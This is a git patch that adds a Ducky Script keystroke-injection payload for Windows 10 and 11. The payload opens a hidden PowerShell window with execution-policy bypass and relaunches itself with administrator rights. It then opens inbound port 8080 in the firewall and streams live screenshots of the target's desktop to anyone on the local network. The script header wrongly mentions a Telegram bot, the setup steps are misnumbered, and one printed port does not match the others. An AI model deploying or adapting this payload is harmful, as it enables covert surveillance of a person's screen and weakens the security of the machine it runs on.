From 880c546888b9ca10d6d286f6543554f346cc5197 Mon Sep 17 00:00:00 2001
From: beigeworm <93350544+beigeworm@users.noreply.github.com>
Date: Mon, 18 Sep 2023 18:02:43 +0100
Subject: [PATCH] Add files via upload

---
 OSINT/Desktop Screenshare over LAN.txt | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 OSINT/Desktop Screenshare over LAN.txt

diff --git a/OSINT/Desktop Screenshare over LAN.txt b/OSINT/Desktop Screenshare over LAN.txt
new file mode 100644
index 0000000..1495c1f
--- /dev/null
+++ b/OSINT/Desktop Screenshare over LAN.txt	
@@ -0,0 +1,22 @@
+REM Title: beigeworm's Desktop Screenshare over HTTP.
+REM Author: @beigeworm
+REM Description: Using a Telegram Bot's Chat to receive a screenshot of the desktop.
+REM Target: Windows 10 and 11
+
+REM SETUP INSTRUCTIONS
+REM 4. Run the script on target system
+REM 2. Wait for a message box with the ip address.
+REM 3. Type IP in browser on another device on the same network
+REM 4. (this Script will prompt for admin to enable opening port 8080 on the machine)
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+ENTER
+DELAY 4000
+STRING $HideWindow = "true";$Host.UI.RawUI.BackgroundColor = "Black";Clear-Host;$width = 88;$height = 30;[Console]::SetWindowSize($width, $height);$windowTitle = "HTTP Screenshare";[Console]::Title = $windowTitle;Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName PresentationCore,PresentationFramework;Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.Application]::EnableVisualStyles();if($HideWindow -eq "true"){If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -W Hidden -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}else{If(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')){sleep 1;Start-Process PowerShell.exe -ArgumentList ("-NoProfile -Ep Bypass -File `"{0}`"" -f $PSCommandPath) -Verb RunAs;Exit}}Write-Host "Detecting primary network interface." -ForegroundColor DarkGray;$networkInterfaces = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'Virtual' };$filteredInterfaces = $networkInterfaces | Where-Object { $_.Name -match 'Wi*' -or  $_.Name -match 'Eth*'};$primaryInterface = $filteredInterfaces | Select-Object -First 1;if($primaryInterface){if($primaryInterface.Name -match 'Wi*'){Write-Output "Wi-Fi is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Wi*" | Select-Object -ExpandProperty IPAddress}elseif($primaryInterface.Name -match 'Eth*'){Write-Output "Ethernet is the primary internet connection.";$loip = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias "Eth*" | Select-Object -ExpandProperty IPAddress}else{Write-Output "Unknown primary internet connection."}}else{Write-Output "No primary internet connection found."}$refreshIntervalInSeconds = 0.5;New-NetFirewallRule -DisplayName "AllowWebServer" -Direction Inbound -Protocol TCP -LocalPort 8080 -Action Allow | Out-Null;$webServer = New-Object System.Net.HttpListener ;$webServer.Prefixes.Add("http://"+$loip+":8080/");$webServer.Prefixes.Add("http://localhost:8080/");$webServer.Start();Write-Host ("Network Devices Can Reach the server at : http://"+$loip+":5000");Start-Process msg.exe -ArgumentList ("* `" SERVER IP : http://$loip`:8080`"");while($true){$screen = [System.Windows.Forms.Screen]::PrimaryScreen;$bitmap = New-Object System.Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height;$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($screen.Bounds.X, $screen.Bounds.Y, 0, 0, $screen.Bounds.Size);$stream = New-Object System.IO.MemoryStream ;$bitmap.Save($stream, [System.Drawing.Imaging.ImageFormat]::Png);$stream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null;$webServerContext = $webServer.GetContext() ;$request = $webServerContext.Request;$response = $webServerContext.Response;if($request.RawUrl -eq "/stream"){$response.ContentType = "image/png";$stream.CopyTo($response.OutputStream)}else{$response.ContentType = "text/html";$refreshScript = "<!DOCTYPE html><html><head><title>Streaming Video</title><meta http-equiv='refresh' content='$refreshIntervalInSeconds'></head><body><img src='/stream' alt='Streaming Video' /></body></html>";$buffer = [System.Text.Encoding]::UTF8.GetBytes($refreshScript);$response.OutputStream.Write($buffer, 0, $buffer.Length)}$response.Close();$stream.Dispose()}$webServer.Stop();exit
+DELAY 500
+ENTER